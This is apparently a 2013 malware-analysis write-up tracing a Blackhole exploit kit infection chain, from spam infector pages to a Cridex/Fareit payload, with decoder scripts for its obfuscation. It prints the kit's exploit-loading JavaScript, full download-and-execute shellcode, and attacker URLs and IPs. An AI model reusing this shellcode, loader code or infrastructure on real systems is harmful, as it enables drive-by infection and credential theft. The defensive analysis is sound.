A Guide to flush Blackhole payloads (Cridex dropped Fareit case)
27 Jan 2013
Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th
Virus Total:
[Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]
Exploit Infector Code Screenshot Pictures:
[SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]
Sample Download--->>[MEDIAFIRE]
Guide & Log: (I'm sorry for using plain text as the report.. lack of time)
=======================================================
#MalwareMustDie - Infection of Blackhole EK via Spam
Landing page: dekamerionka.ru:8080
IP: 81.31.47.124, 91.224.135.20, 212.112.207.15
A guide to flush the Blackhole Payload & Infectors...
@unixfreaxjp /malware]$ date
Tue Jan 15 23:05:49 JST 2013
=======================================================
Infector urls...
h00p://ideawiz .org/letter.htm
h00p://threesaints .org.uk/letter.htm
h00p://masreptiles.terrarium .pl/letter.htm
// Download URLs of all the exploit components and the payload:
PD-079 : h00p://dekamerionka .ru:8080/forum/links/column.php
jar : h00p://dekamerionka .ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
payload : h00p://dekamerionka .ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
swf1 : h00p://dekamerionka .ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
swf2 : h00p://dekamerionka .ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
pdf1 : h00p://dekamerionka .ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
pdf2 : h00p://dekamerionka .ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
//infector page access...
--20:26:45-- h00p://threesaints .org.uk/letter.htm
=> `letter.htm'
Resolving threesaints .org.uk... seconds 0.00, 173.254.28.107
Caching threesaints .org.uk => 173.254.28.107
Connecting to threesaints .org.uk|173.254.28.107|:80... seconds 0.00, connected.
:
GET /letter.htm HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: threesaints .org.uk
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2013 11:26:45 GMT
Server: Apache
Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT
ETag: "4f03efb-1a9-4d351dcda592d"
Accept-Ranges: bytes
Content-Length: 425
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
:
200 OK
Length: 425 [text/html]
20:26:47 (11.89 MB/s) - letter.htm saved [425/425]
// which contained this code:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dekamerionka.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
-----------------------------------------------------------
// a trivial always-true check (var1==var2), which forwards you to the BHEK landing page....
--20:28:05-- h00p://dekamerionka .ru:8080/forum/links/column.php
=> `column.php
Resolving dekamerionka.ru... seconds 0.00, 81.31.47.124, 91.224.135.20, 212.112.207.15
Caching dekamerionka.ru => 81.31.47.124 91.224.135.20 212.112.207.15
Connecting to dekamerionka.ru|81.31.47.124|:8080... seconds 0.00, connected.
:
GET /forum/links/column .php HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 11:28:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
:
200 OK
Length: unspecified [text/html]
20:28:07 (69.85 KB/s) - column.php saved [117566]
A new obfuscation of the BHEK landing page..
first time I have seen this one:
<html><head><title></title></head><body>
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&y..
<param name="val" value="Dyy3OjjMeqV0el8toqV..
<param value="" name="prime"
<script>function c(){if(window.document)s+=String.fromCharCode(a..
var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!..
:
...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59";
a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++){
c();
}
z=true;
try{document.createElement("span");}catch(q){z=false;}
if(window.document)if(z)e(s);
</script></body></html>
Landing page structure:
:
// applet
<applet code="hw" archive="/forum/links/column.php? cabimab=lij &ymwbck =rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" />
</applet>
:
// first script
function c()
{
if(window.document)s+=String.fromCharCode(a[i]);
}
e=eval;
sp="split";
// followed by the second script with the obfuscated data:
var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59";
// decoder loop (the "!" is a disguised digit 1; each field is a decimal char code)..
a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++)
{
c();
}
z=true;
try
{
document.createElement("span");
}
catch(q)
{
z=false;
}
if(window.document)if(z)e(s);
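The two scripts above are the whole decoder: undo the "!" for "1" substitution, split on ":", turn every decimal field into a character, then hand the result to e (which is eval). Note the gate before the eval: stage 2 only runs if window.document exists and document.createElement("span") does not throw, so a bare JS engine without a DOM stub never reaches it. The block below is an added example, not code from the original post or from the kit: it is the same decoder with the eval replaced by a return value, so the stage 2 can be read instead of run. The page's own `a` string is truncated, so the checks use its visible prefix plus a sample constructed here by re-encoding the x() helper quoted later in the post.

```javascript
// Added example, not code from the original post: a static decoder for the
// landing page's charcode blob that returns the stage-2 script instead of
// eval()ing it.

// Inverse of the page's loop:
//   a=a.replace(/!/g,1)[sp](":"); for(...){ s+=String.fromCharCode(a[i]); } e(s);
function bhekDecode(a) {
  const fields = a.replace(/!/g, "1").split(":");
  let s = "";
  for (const f of fields) {
    if (!/^\d+$/.test(f)) throw new Error("not a char-code field: " + JSON.stringify(f));
    s += String.fromCharCode(Number(f));
  }
  return s; // read it; never eval it
}

// Forward transform implied by the decoder: decimal char codes joined with ":",
// then every digit 1 written as "!". Only needed to build the sample below.
function bhekEncode(js) {
  return Array.from(js, ch => String(ch.charCodeAt(0))).join(":").replace(/1/g, "!");
}

// Visible prefix of the page's `a` (from the `var a = "!!8:97:..."` line).
const PAGE_PREFIX = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99";

// Constructed sample: the stage-2 x() helper quoted later in the post, re-encoded.
const STAGE2_FRAGMENT =
  'function x(s){d=[];for(i=0;i<s.length;i++){k=(s.charCodeAt(i)).toString(33);d.push(k);};return d.join(":");}';
const SAMPLE_A = bhekEncode(STAGE2_FRAGMENT);

console.log(bhekDecode(PAGE_PREFIX));                   // start of the PluginDetect bootstrap
console.log(bhekDecode(SAMPLE_A) === STAGE2_FRAGMENT);  // round trip of the constructed sample
```

The visible prefix decodes to "var PluginDetec", which matches the `$$["onDetec"+"tionDone"]("Ja"+"va", ...)` PluginDetect call that shows up in the decoded stage 2 further down.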
The summary of the infection method used in this landing page.
// From this landing page we get the following infections:
// 1. The applet tag in the HTML landing page infects you with
//    the JAR (the first infection; the 0day Java JAR is served here..)
<applet code="hw" archive="/forum/links/column .php ? cabimab=lij & ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>
// 2. The obfuscated script of the landing page infects you with:
// flash/swf SWF1 exploit.....
function getCN()
{ return "/forum/links/column .php ? cphwe=" + x("c833f") + "&tgou=" + x("kqddo") +
"&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
// pdf1
function p1(){
var d = document.createElement("object");
d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x( "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);}
// pdf2
function p2(){
var d = document.createElement("object");
d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x( "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);
}
// flash/swf SWF2 exploit....
function ff2(){
var oSpan = document.createElement("span");
var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") + "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp";
oSpan.innerHTML =
"<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>" +
"<param name='movie' value='" + url + "' />" +
"<param name='allowScriptAccess' value='always' />" +
"<param name='Play' value='0' />" +
"<embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>" +
"</embed></object>";
document.body.appendChild(oSpan); }
// the shellcode (used by the exploits above; it downloads and runs the payload)
function getShellCode(){
var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split("").
reverse().join("");
return a["replace"](/\%!/g, "%" + "u") }
// and a PluginDetect call (getJavaInfo.jar) to detect your Java version
$$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo .jar");
Shellcode & Payload:
// change the code to the below and see the decoded shellcode:
var a = "8200!%4482!...!%1414!%".split("").reverse().join("");
var xxx=a["replace"](/\%!/g, "%" + "u");
document.write(xxx);
// output:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u09e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad
%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d
%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd
%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d
%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385
%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278
%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c
%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef
%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f
%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842
%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28
%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2
%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4d4c%u4943%u4d45%u415a%u4647%u4943%u5a06%u125d%u1810
%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e4f%u1b15%u1218%u4619
%u1912%u1241%u4119%u1b12%u0e1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243
%u191b%u1912%u1242%u4719%u490e%u1915%u0e43%u474f%u4615%u430e%u155e%u2844%u0028
--------------------------------------------------------------------------------
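Two details trip people up when turning that output into bytes for an emulator or a disassembler: the stored string in getShellCode() is the whole escape sequence written backwards with "%u" spelled "!%", and each %uXXXX is a little-endian 16-bit word, so "%u8366" is the bytes 66 83 and not 83 66 (copying the two hex pairs in print order silently corrupts the shellcode). The block below is an added example, not code from the post or the kit; it reproduces the kit's reversal and then converts the %u words to bytes in memory order. The sample is built from the visible head and tail of the page's stored string, since the middle is elided on the page.

```javascript
// Added example, not from the original post: recover raw shellcode bytes from
// the getShellCode() string of the landing page.

// Mirrors the kit: a.split("").reverse().join("") then a["replace"](/\%!/g, "%u")
function unreverse(stored) {
  return stored.split("").reverse().join("").replace(/%!/g, "%u");
}

// "%uXXXX%uYYYY..." -> Uint8Array, little-endian per word. Refuses strings that
// contain anything but clean %u words (for instance a letter O in place of 0).
function unicodeEscapeToBytes(escaped) {
  const words = escaped.match(/%u[0-9a-fA-F]{4}/g) || [];
  if (words.join("") !== escaped) throw new Error("string is not a pure run of %u words");
  const out = new Uint8Array(words.length * 2);
  words.forEach((w, i) => {
    const v = parseInt(w.slice(2), 16);
    out[2 * i] = v & 0xff;      // low byte first
    out[2 * i + 1] = v >> 8;    // then high byte
  });
  return out;
}

function toHex(bytes) {
  return Array.from(bytes, b => b.toString(16).padStart(2, "0")).join(" ");
}

// Sample built from the page: the first six words of the stored string plus its
// last one ("...!%1414!%"); the real string's middle is elided on the page.
const STORED_SAMPLE = "8200!%4482!%e551!%e034!%5164!%f474!%" + "1414!%";
const SHELLCODE_SAMPLE = unicodeEscapeToBytes(unreverse(STORED_SAMPLE));

console.log(toHex(SHELLCODE_SAMPLE));
```

After un-reversing, the sample is %u4141 followed by %u474f%u4615%u430e%u155e%u2844%u0028, i.e. bytes 41 41 4f 47 15 46 0e 43 5e 15 44 28 28 00: the first two bytes of the real shellcode and its last twelve, exactly as the hex dump below ends them.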
// #Tips: if you want to use libemu to crack this, I made the format below for you..
// (byte order: each %uXXXX word is little-endian, so %u8366 is the bytes 66 83,
// the order shown in the hex dump further below, not 83 66)
import pylibemu

# The 536 decoded bytes in memory order (the letter O in the blog rendering is the digit 0).
SHELLCODE_HEX = """
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81
e9 09 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07
58 40 5c 5c 58 12 07 07 4c 4d 43 49 45 4d 5a 41
47 46 43 49 06 5a 5d 12 10 18 10 18 07 4e 47 5a
5d 45 07 44 41 46 43 5b 07 4b 47 44 5d 45 46 06
58 40 58 17 4f 4e 15 1b 18 12 19 46 12 19 41 12
19 41 12 1b 1b 0e 47 4d 15 1a 5e 12 19 43 12 19
45 12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19
12 19 42 12 19 47 0e 49 15 19 43 0e 4f 47 15 46
0e 43 5e 15 44 28 28 00
"""
# bytearray.fromhex works on both Python 2.7 and Python 3
shellcode = bytes(bytearray.fromhex("".join(SHELLCODE_HEX.split())))
assert len(shellcode) == 536

emulator = pylibemu.Emulator()
offset = emulator.shellcode_getpc_test(shellcode)  # -1 if libemu finds no GetPC pattern
print("getpc offset: %d" % offset)
if offset >= 0:
    emulator.prepare(shellcode, offset)
    emulator.test()
    print(emulator.emu_profile_output)
----------------------------------------------------------------------------
// my way is...
// save the binary and disassemble it..
----------------------------------------------------------------------------
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 09 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+.....8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 4c 4d 43 49 45 4d 5a 41 X@\\X...LMCIEMZA
47 46 43 49 06 5a 5d 12 10 18 10 18 07 4e 47 5a GFCI.Z]......NGZ
5d 45 07 44 41 46 43 5b 07 4b 47 44 5d 45 46 06 ]E.DAFC[.KGD]EF.
58 40 58 17 4f 4e 15 1b 18 12 19 46 12 19 41 12 X@X.ON.....F..A.
19 41 12 1b 1b 0e 47 4d 15 1a 5e 12 19 43 12 19 .A....GM..^..C..
45 12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 E........C..C...
12 19 42 12 19 47 0e 49 15 19 43 0e 4f 47 15 46 ..B..G.I..C.OG.F
0e 43 5e 15 44 28 28 00 .C^.D((.
-------------------------------------------------------------------
// see the payload URL in the urlmon.URLDownloadToFileA call at 0x1a494bbe below ↓
// (the dropped wpbt0.dll is then run via WinExec and registered with regsvr32 -s)
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dekam erionka .ru : 8080/forum/links/column .php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0 .dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
// the payload is here..
h00p://dekamerionka .ru:8080/forum/links/column .php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
// download...
--21:33:38-- h00p://dekamerionka .ru:8080/forum/links/column .php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
=> `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l'
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:33:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 15 Jan 2013 12:33:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=calc.exe
Content-Transfer-Encoding: binary
Content-Length: 140288
200 OK
Length: 140,288 (137K) [application/x-msdownload]
100%[====================================>] 140,288 64.83K/s
21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288]
Getting infector components
:
// let's get the SWF1...
// I prefer to check the obfuscated link in the function below:
function getCN(){
return "/forum/links/column .php?cph we=" + x("c833f") + "&tgou=" + x("kqddo") +
"&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
// it uses function x(), so let's use it as well to decode the values in the URL string..
// (x() writes every character code in base 33 and joins them with ":")
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i)).toString(33);
d.push(k);
}
return d.join(":");
}
var xxx= "/forum/links/column. php?c phwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";
document.write(xxx);
// result:
/forum/links/colum n.php?c phwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&em ubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
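Running x() forward reproduces the URLs, but the useful direction for triage is the inverse: parseInt(field, 33) per ":"-separated field gives back the plaintext, which is how the "30:1n:1i:1i:33" and "2v:1k:1m:32:33:1k:1k:31:1j:1o" tokens that recur in every one of the kit's URLs can be read. The block below is an added example, not code from the post or the kit. It assumes only what the page shows: values that decode to printable ASCII are x()-encoded, while tags such as cabimab=lij or zjxsiyt=kxy are not and are left untouched. The SWF1 URL used as input is the page's own, with the defanging spaces removed.

```javascript
// Added example, not from the original post: inverse of the landing page's x()
// helper, applied to the query string of a Blackhole exploit URL.

// Same transform as the page's x(); kept here only for the round-trip check.
function xEncode(s) {
  return Array.from(s, ch => ch.charCodeAt(0).toString(33)).join(":");
}

// Inverse of x(); null when the value is not a clean x()-encoded string.
function xDecode(v) {
  let out = "";
  for (const f of v.split(":")) {
    if (!/^[0-9a-w]{1,2}$/.test(f)) return null;  // base-33 digits are 0-9 and a-w
    const code = parseInt(f, 33);
    if (code < 0x20 || code > 0x7e) return null;  // not printable ASCII: not x()-encoded
    out += String.fromCharCode(code);
  }
  return out;
}

// Decode the query string of a BHEK URL into {name: decodedValue}; values that
// are not x()-encoded are returned as they appear in the URL.
function decodeBhekQuery(url) {
  const query = url.slice(url.indexOf("?") + 1);
  const out = {};
  for (const pair of query.split("&")) {
    const eq = pair.indexOf("=");
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? "" : pair.slice(eq + 1);
    const decoded = xDecode(value);
    out[name] = decoded === null ? value : decoded;
  }
  return out;
}

// SWF1 URL from the post (defanging spaces removed).
const SWF1 = "/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c" +
             "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";

console.log(decodeBhekQuery(SWF1));
```

The decoded values are cphwe=c833f, tgou=kqddo and emubvku=a57ef55d49, with zjxsiyt=kxy left as a plain tag. The same two constants, c833f and a57ef55d49, sit in every URL of this kit instance (cdaa/yjjdw/jkmflr and feocz/hqxcfgl/rshcr/oe), and the PDF version slot "1k:1d:1f:1d:1g:1d:1f" used in the PDF fetches decodes to "5.0.1.0". Single-field values such as a=1k are ambiguous (they decode to "5" but may be a plain tag), so treat those with care.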
//download it...
h00p://dekamerion ka .ru:8 080/forum/links/column .php?cphw e=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
GET /forum/links/column .php?cp hwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:50:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 7238
200 OK
Registered socket 1896 for persistent reuse.
Length: 7,238 (7.1K) [text/html]
100%[====================================>] 7,238 22.73K/s
// Get the SWF2 Infector,..
// same method...
h00p://dekamerionka .ru:8 080/forum/links/column .php?jk mflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
